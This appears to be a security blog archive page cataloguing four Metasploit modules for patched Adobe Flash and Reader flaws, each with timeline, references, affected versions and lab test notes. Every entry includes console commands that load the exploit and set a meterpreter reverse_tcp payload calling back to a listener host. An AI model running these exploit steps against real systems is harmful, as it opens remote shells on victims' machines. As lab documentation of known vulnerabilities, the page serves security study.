Tag Archives: Adobe

CVE-2014-0515 Adobe Flash Player Shader Buffer Overflow

Timeline :

Vulnerability discovered exploited in the wild in 2014-04-14 by Kaspersky Lab
Patched by the vendor via APSB14-13 the 2014–04-28
Windows Metasploit PoC provided the 2014-05-08
Vulnerability reported integrated into exploit kits the 2014-06-07
Multi platform Metasploit PoC provided the 2015-06-11

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2014-0515
BID-67092
APSB14-13

Affected version(s) :

Adobe Flash Player 13.0.0.182 and earlier versions for Windows
Adobe Flash Player 13.0.0.201 and earlier versions for Macintosh
Adobe Flash Player 11.2.202.350 and earlier versions for Linux

Tested on :

with Adobe Flash Player 13.0.0.182 (flashplayer13_0r0_182_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on the following operating systems and Flash versions: Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182, Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182, Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182, Linux Mint “Rebecca” (32 bit), Firefox 33.0 and Adobe Flash 11.2.202.350

Commands :

use exploit/multi/browser/adobe_flash_pixel_bender_bof
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

CVE-2014-0497 Adobe Flash Player Integer Underflow Remote Code Execution

Timeline :

Vulnerability discovered exploited in the wild the 2014-02
Patched by the vendor via APSB14-04 the 2014-02-04
Vulnerability reported integrated into exploit kits the 2014-02
Metasploit PoC provided the 2014–05-04

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2014-0497
BID-65327
APSB14-04

Affected version(s) :

Adobe Flash Player 12.0.0.43 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.335 and earlier versions for Linux

Tested on :

with Flash Player 11.7.700.202 Active X version (flashplayer11_7r700_202_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an integer underflow in several avm2 instructions, which can be turned into remote code execution under the context of the user, as exploited in the wild in February 2014. This module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes rop chains for several Flash 11 versions, as exploited in the wild.

Commands :

use exploit/windows/browser/adobe_flash_avm2
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-5331 Adobe Flash Player Type Confusion Remote Code Execution

Timeline :

Vulnerability discovered exploited in the wild the 2013-11
Patched by the vendor via APSB13-28 the 2013-12-10
Metasploit PoC provided the 2014–04-27

PoC provided by :

Unknown
bannedit
juan vazquez

Reference(s) :

CVE-2013-5331
BID-64199
APSB13-28

Affected version(s) :

Adobe Flash Player 11.9.900.152 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.327 and earlier versions for Linux

Tested on :

with Flash Player 11.9.900.152 Active X version (flashplayer11_9r900_152_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits a type confusion vulnerability found in the ActiveX component of Adobe Flash Player. This vulnerability was found exploited in the wild in November 2013. This module has been tested successfully on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170 over Windows XP SP3 and Windows 7 SP1.

Commands :

use exploit/windows/browser/adobe_flash_filters_type_confusion
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-3346 Adobe Reader ToolButton Use After Free

Timeline :

Vulnerability discovered by Soroush Dalili and reported to ZDI
Vulnerability reported to the vendor by ZDI the 2013-09-11
Patched by the vendor via APSB13-15 the 2013-08-03
Coordinated public release of advisory by ZDI the 2013-09-11
Vulnerability exploited in the wild in combination with another vulnerability the 2013-11-27
Metasploit PoC provided the 2013-12-16

PoC provided by :

Soroush Dalili
Unknown
sinn3r
juan vazquez

Reference(s) :

CVE-2013-3346
OSVDB-96745
ZDI-13-212
APSB13-15

Affected version(s) :

Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior.

Tested on :

with Adobe Reader 11.0.2 on Windows XP SP3

Description :

This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in November, 2013. At the moment, this module doesn’t support Adobe Reader 9 targets; in order to exploit Adobe Reader 9 the fileformat version of the exploit can be used. This exploit also exist in File format exploit/windows/fileformat/adobe_toolbutton

Commands :

use exploit/windows/browser/adobe_toolbutton
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo